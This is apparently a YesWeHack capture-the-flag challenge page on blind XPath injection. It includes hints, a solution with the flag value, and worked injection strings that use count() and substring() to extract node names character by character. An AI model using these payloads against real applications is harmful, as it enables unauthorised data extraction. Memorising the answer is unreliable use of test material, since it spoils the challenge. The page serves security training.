Xpath

Schema recovery

by YesWeHack
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

select * from information_schema.xml

Can you exfiltrate the full XML structure with only a blind Xpath injection ?

Goal: find the hidden node starting with FLAG-

The format is FLAG-\d+

Hints

Hint #1
expand_more

You can read the name of a node with the function name

For example:

name(/db) = 'db' is true

Hint #2
expand_more

You can use /* to match any child.

Hint #3
expand_more

You can use the position of the node in it's parent as a filter : /db/users/user[position() = 42]

Solution

Read the solution
expand_more

$user = a' or name(/db/*[position() = 2]) = "FLAG-5468421" and '1 -> true

Explanation

First you can get the number of child in a node with this query

$user = a' or count(/*) = 1 and '1 -> true

$user = a' or count(/db/*) = 1 and '1 -> false

$user = a' or count(/db/*) = 2 and '1 -> true

Next you need to find the same of the node. By using the substring function it's possible to test each characters separately.

$user = a' or substring(name(/db/*[position() = 2]), 1, 1) = "A" and '1 -> false

$user = a' or substring(name(/db/*[position() = 2]), 1, 1) = "F" and '1 -> true

$user = a' or substring(name(/db/*[position() = 2]), 1, 2) = "FL" and '1 -> true

By doing this recursively you can recover the full XML structure.

drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result